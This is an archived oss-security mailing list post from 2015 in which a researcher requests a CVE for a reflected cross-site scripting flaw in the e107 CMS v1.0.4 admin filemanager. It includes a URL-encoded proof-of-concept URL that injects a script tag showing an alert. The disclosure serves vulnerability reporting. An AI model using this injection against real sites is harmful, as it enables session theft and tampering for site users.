Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CALH-=7wqJS3X4G+bkAy0sQCFUK6wQRVitcxnnoGbmVt9U5AmfQ@mail.gmail.com>
Date: Fri, 9 Jan 2015 18:48:12 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE Request -- CMS e107 v.1.0.4 -- Reflecting XSS vulnerability in
 filemanager functionality

Hi Josh, Steve, vendors, list.

I found a reflecting XSS vulnerability in the filemanager functionality in
the administrative backend of CMS e107 v.1.0.4.

It can be exploited by an attacker like in the following example:

http://{TARGET}/e107_admin/filemanager.php?e107_files/%3C%73%63%72%69%70%74%3Ealert(String.fromCharCode(34,
88, 83, 83,
34))%3C%2F%73%63%72%69%70%74%3E%3C!--%3C%2F%73%63%72%69%70%74%3E%3C!--

Could you please assign a CVE-ID for it?

Thank you!

Greetings.

Steffen Rösemann

References:

[1] http://e107.org/
[2] http://sroesemann.blogspot.de/2014/12/sroeadv-2014-05.html
[3] https://github.com/e107inc/e107v1/issues/2
[4]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-05.html
[5] http://seclists.org/fulldisclosure/2015/Jan/18

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.